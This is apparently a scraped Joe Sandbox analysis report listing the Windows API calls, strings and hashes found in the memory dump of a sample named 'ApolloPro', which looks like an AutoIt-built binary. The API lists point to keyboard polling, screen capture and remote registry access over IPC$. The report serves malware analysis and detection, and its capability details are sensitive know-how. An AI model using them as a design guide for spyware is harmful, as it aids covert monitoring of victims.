• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00688C92
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
APIs
• GetDC.USER32(00000000), ref: 006A7A79
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006A7A85
• CreateCompatibleDC.GDI32(?), ref: 006A7A91
• SelectObject.GDI32(00000000,?), ref: 006A7A9E
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 006A7AF2
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 006A7B2E
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 006A7B52
• SelectObject.GDI32(00000006,?), ref: 006A7B5A
• DeleteObject.GDI32(?), ref: 006A7B63
• DeleteDC.GDI32(00000006), ref: 006A7B6A
• ReleaseDC.USER32(00000000,?), ref: 006A7B75
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0069A4D4
  • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
• LoadStringW.USER32(?,?,00000FFF,?), ref: 0069A4F6
• __swprintf.LIBCMT ref: 0069A54F
• __swprintf.LIBCMT ref: 0069A568
• _wprintf.LIBCMT ref: 0069A61E
• _wprintf.LIBCMT ref: 0069A63C
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-2391861430
APIs
  • Part of subcall function 0069951A: __time64.LIBCMT ref: 00699524
  • Part of subcall function 00644A8C: _fseek.LIBCMT ref: 00644AA4
• __wsplitpath.LIBCMT ref: 006997EF
  • Part of subcall function 0065431E: __wsplitpath_helper.LIBCMT ref: 0065435E
• _wcscpy.LIBCMT ref: 00699802
• _wcscat.LIBCMT ref: 00699815
• __wsplitpath.LIBCMT ref: 0069983A
• _wcscat.LIBCMT ref: 00699850
• _wcscat.LIBCMT ref: 00699863
  • Part of subcall function 00699560: _memmove.LIBCMT ref: 00699599
  • Part of subcall function 00699560: _memmove.LIBCMT ref: 006995A8
• _wcscmp.LIBCMT ref: 006997AA
  • Part of subcall function 00699CF1: _wcscmp.LIBCMT ref: 00699DE1
  • Part of subcall function 00699CF1: _wcscmp.LIBCMT ref: 00699DF4
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00699A0D
• _wcsncpy.LIBCMT ref: 00699A80
• DeleteFileW.KERNEL32(?,?), ref: 00699AB6
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00699ACC
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00699ADD
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00699AEF
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0
APIs
• _memset.LIBCMT ref: 00645BF1
• GetMenuItemCount.USER32(006F7890), ref: 00680E7B
• GetMenuItemCount.USER32(006F7890), ref: 00680F2B
• GetCursorPos.USER32(?), ref: 00680F6F
• SetForegroundWindow.USER32(00000000), ref: 00680F78
• TrackPopupMenuEx.USER32(006F7890,00000000,?,00000000,00000000,00000000), ref: 00680F8B
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00680F97
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 2751501086-0
APIs
• CharLowerBuffW.USER32(?,?,006C0980), ref: 0069AF4E
• GetDriveTypeW.KERNEL32(00000061,006EB5F0,00000061), ref: 0069B018
• _wcscpy.LIBCMT ref: 0069B042
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                                              • String ID: L,l$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                              • API String ID: 2820617543-2287776679
                                                                                              • Opcode ID: 6e95ec46772dbfbfd5823a83b5049bb6ca7e9bc0e4270744686413fff07e93c1
                                                                                              • Instruction ID: af487fe297e251e83f953447e29e3b0de61071134d7b2b52bdef58a0de8a1372
                                                                                              • Opcode Fuzzy Hash: 6e95ec46772dbfbfd5823a83b5049bb6ca7e9bc0e4270744686413fff07e93c1
                                                                                              • Instruction Fuzzy Hash: 3A51DE701083059BCB50EF54D992AAFB7EBEF91300F10491DF895476A2EB31ED09CA86
                                                                                              APIs
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              • _memset.LIBCMT ref: 00688489
                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006884BE
                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006884DA
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006884F6
                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00688520
                                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00688548
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00688553
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00688558
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                              • API String ID: 1411258926-22481851
                                                                                              • Opcode ID: 041b37b8c1afad1250f7b392d90a461070ba14d31aaec9ff56c027bf6e983a2a
                                                                                              • Instruction ID: f56ab539725f90ed17280033cd01666f4f1d3279f9d5fc5a9853c3f9d7a5342b
                                                                                              • Opcode Fuzzy Hash: 041b37b8c1afad1250f7b392d90a461070ba14d31aaec9ff56c027bf6e983a2a
                                                                                              • Instruction Fuzzy Hash: 50410572C1022DABDF11EBA4DC95DEEBBBAFF05340F404129E905A7261EB309E44CB90
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,006B040D,?,?), ref: 006B1491
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper
                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                              • API String ID: 3964851224-909552448
                                                                                              • Opcode ID: 745e865d614272c2764a9f2cf8b7383c5dbb0f3c512e13848e0cf9735449bdb4
                                                                                              • Instruction ID: ae316b9602532f5c4f87a11dadd472bc49f65b2b094e21f97ac2069e4bdbbf0e
                                                                                              • Opcode Fuzzy Hash: 745e865d614272c2764a9f2cf8b7383c5dbb0f3c512e13848e0cf9735449bdb4
                                                                                              • Instruction Fuzzy Hash: F8419FB251025ADBDF50EF50D960AEA3737BF52310FA00518FC524B292DB30EE9ACB50
                                                                                              APIs
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                                • Part of subcall function 0064153B: _memmove.LIBCMT ref: 006415C4
                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006958EB
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00695901
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00695912
                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00695924
                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00695935
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_memmove
                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                              • API String ID: 2279737902-1007645807
                                                                                              • Opcode ID: 9a624cac2fe9bb424f72327514f0f68eda760778284bf8c3730e71f389108d9b
                                                                                              • Instruction ID: 2924e4933007fe1ae1498ca6bf1b3c678bb41a17b1960b1944b08a3ef2bf1400
                                                                                              • Opcode Fuzzy Hash: 9a624cac2fe9bb424f72327514f0f68eda760778284bf8c3730e71f389108d9b
                                                                                              • Instruction Fuzzy Hash: F411C4319512ADB9EB20A7A2DC5ADFF7B7EEBD2B50F400429B405A60D0EE701D45CAA4
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 208665112-3771769585
                                                                                              • Opcode ID: c8156327357d4ebdce0d1e888cb20c5631a07f60aa6d34a979bfbf9320c6de47
                                                                                              • Instruction ID: 93616cbae225700c92cd22bd5b6662e6fa7686187fa5f2ac96431e464c09ef64
                                                                                              • Opcode Fuzzy Hash: c8156327357d4ebdce0d1e888cb20c5631a07f60aa6d34a979bfbf9320c6de47
                                                                                              • Instruction Fuzzy Hash: 03116632505109EFDF90AB209C4AEEE77BEDF41712F0001AAF404A6291EF70D9868BA0
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00695535
                                                                                                • Part of subcall function 00650859: timeGetTime.WINMM(?,00000002,0063C22C), ref: 0065085D
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00695561
                                                                                              • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00695585
                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006955A7
                                                                                              • SetActiveWindow.USER32 ref: 006955C6
                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006955D4
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 006955F3
                                                                                              • Sleep.KERNEL32(000000FA), ref: 006955FE
                                                                                              • IsWindow.USER32 ref: 0069560A
                                                                                              • EndDialog.USER32(00000000), ref: 0069561B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                              • String ID: BUTTON
                                                                                              • API String ID: 1194449130-3405671355
                                                                                              • Opcode ID: ddef741f1ac1ed499d5cdd70f2d44a1a4f7809c78273cff5e579c49a5e0de82f
                                                                                              • Instruction ID: 093ad7ca5bb49f8e3a6ecf8e55c139ba92823429a110c9991c8151ed0956cb0d
                                                                                              • Opcode Fuzzy Hash: ddef741f1ac1ed499d5cdd70f2d44a1a4f7809c78273cff5e579c49a5e0de82f
                                                                                              • Instruction Fuzzy Hash: 4F2149B0204A04AFFF825FA4ED89E363B6FEB44345F553018F402826B1DA719D51DB61
                                                                                              APIs
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • CoInitialize.OLE32(00000000), ref: 0069DC2D
                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0069DCC0
                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 0069DCD4
                                                                                              • CoCreateInstance.OLE32(006C3D4C,00000000,00000001,006EB86C,?), ref: 0069DD20
                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0069DD8F
                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 0069DDE7
                                                                                              • _memset.LIBCMT ref: 0069DE24
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0069DE60
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0069DE83
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0069DE8A
                                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0069DEC1
                                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0069DEC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1246142700-0
                                                                                              • Opcode ID: 1e6b40483412c3b91f34c702c6a397ea2f2901f9ccedd1aaf30240151c51d021
                                                                                              • Instruction ID: f0c3c0ba339682a2edafa38ca7ba2d120a58180ba6e70c38b6bc66548f1044fd
                                                                                              • Opcode Fuzzy Hash: 1e6b40483412c3b91f34c702c6a397ea2f2901f9ccedd1aaf30240151c51d021
                                                                                              • Instruction Fuzzy Hash: 24B1D975A00109EFDB44DFA4C889DAEBBBAEF48304F148469E905EB351DB31EE45CB94
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00690896
                                                                                              • SetKeyboardState.USER32(?), ref: 00690901
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00690921
                                                                                              • GetKeyState.USER32(000000A0), ref: 00690938
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00690967
                                                                                              • GetKeyState.USER32(000000A1), ref: 00690978
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 006909A4
                                                                                              • GetKeyState.USER32(00000011), ref: 006909B2
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 006909DB
                                                                                              • GetKeyState.USER32(00000012), ref: 006909E9
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00690A12
                                                                                              • GetKeyState.USER32(0000005B), ref: 00690A20
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 0068CE1C
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0068CE2E
                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0068CE8C
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0068CE97
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0068CEA9
                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0068CEFD
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0068CF0B
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0068CF1C
                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0068CF5F
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0068CF6D
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0068CF8A
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0068CF97
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              APIs
                                                                                                • Part of subcall function 006329AB: GetWindowLongW.USER32(?,000000EB), ref: 006329BC
                                                                                              • GetSysColor.USER32(0000000F), ref: 006325AF
                                                                                              Similarity
                                                                                              • API ID: ColorLongWindow
                                                                                              • String ID:
                                                                                              APIs
                                                                                                • Part of subcall function 00650B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00642A3E,?,00008000), ref: 00650BA7
                                                                                                • Part of subcall function 00650284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00642A58,?,00008000), ref: 006502A4
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00642ADF
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00642C2C
                                                                                                • Part of subcall function 00643EBE: _wcscpy.LIBCMT ref: 00643EF6
                                                                                                • Part of subcall function 0065386D: _iswctype.LIBCMT ref: 00653875
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: __i64tow__itow__swprintf
                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006B778F
                                                                                              • CreateMenu.USER32 ref: 006B77AA
                                                                                              • SetMenu.USER32(?,00000000), ref: 006B77B9
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B7846
                                                                                              • IsMenu.USER32(?), ref: 006B785C
                                                                                              • CreatePopupMenu.USER32 ref: 006B7866
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006B7893
                                                                                              • DrawMenuBar.USER32 ref: 006B789B
                                                                                              Similarity
                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                              • String ID: 0$F
                                                                                              APIs
                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006B7B83
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 006B7B8A
                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006B7B9D
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 006B7BA5
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 006B7BB0
                                                                                              • DeleteDC.GDI32(00000000), ref: 006B7BB9
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006B7BC3
                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006B7BD7
                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006B7BE3
                                                                                              Similarity
                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                              • String ID: static
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 0065706B
                                                                                                • Part of subcall function 00658D58: __getptd_noexit.LIBCMT ref: 00658D58
                                                                                              • __gmtime64_s.LIBCMT ref: 00657104
                                                                                              • __gmtime64_s.LIBCMT ref: 0065713A
                                                                                              • __gmtime64_s.LIBCMT ref: 00657157
                                                                                              • __allrem.LIBCMT ref: 006571AD
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006571C9
                                                                                              • __allrem.LIBCMT ref: 006571E0
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006571FE
                                                                                              • __allrem.LIBCMT ref: 00657215
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00657233
                                                                                              • __invoke_watson.LIBCMT ref: 006572A4
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00692CE9
                                                                                              • GetMenuItemInfoW.USER32(006F7890,000000FF,00000000,00000030), ref: 00692D4A
                                                                                              • SetMenuItemInfoW.USER32(006F7890,00000004,00000000,00000030), ref: 00692D80
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00692D92
                                                                                              • GetMenuItemCount.USER32(?), ref: 00692DD6
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00692DF2
                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00692E1C
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00692E61
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00692EA7
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00692EBB
                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00692EDC
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4176008265-0
                                                                                              • Opcode ID: 1383317a0985e8988b3087f18e4861bea5aeb64b2e8d8c3a1e6b05956b65a1a3
                                                                                              • Instruction ID: 6b4270d5adfda1eb77e288feba88b1c911f7734b217ecb46dd62eab322ddcbc0
                                                                                              • Opcode Fuzzy Hash: 1383317a0985e8988b3087f18e4861bea5aeb64b2e8d8c3a1e6b05956b65a1a3
                                                                                              • Instruction Fuzzy Hash: 2861587090024ABFEF21DF64D9A8EFEBBBEEB45304F144459E841A7651D731AE06DB20
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006B75CA
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006B75CD
• GetWindowLongW.USER32(?,000000F0), ref: 006B75F1
• _memset.LIBCMT ref: 006B7602
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006B7614
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006B768C
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: ca9bb9da342f11f07acfaf33713c75bbf655963275119c7760b9a8e3bc602f61
• Instruction ID: 50bcf3e3433e2a41dc30c0c815e87e2a8d109d350f3b56a14c6341466538561d
• Opcode Fuzzy Hash: ca9bb9da342f11f07acfaf33713c75bbf655963275119c7760b9a8e3bc602f61
• Instruction Fuzzy Hash: A5616BB5904208AFDB10DFA4CC85EEE77F9EB49710F1041A9FA14A73A1D770AE81DB60
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006877DD
• SafeArrayAllocData.OLEAUT32(?), ref: 00687836
• VariantInit.OLEAUT32(?), ref: 00687848
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00687868
• VariantCopy.OLEAUT32(?,?), ref: 006878BB
• SafeArrayUnaccessData.OLEAUT32(?), ref: 006878CF
• VariantClear.OLEAUT32(?), ref: 006878E4
• SafeArrayDestroyData.OLEAUT32(?), ref: 006878F1
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006878FA
• VariantClear.OLEAUT32(?), ref: 0068790C
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00687917
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
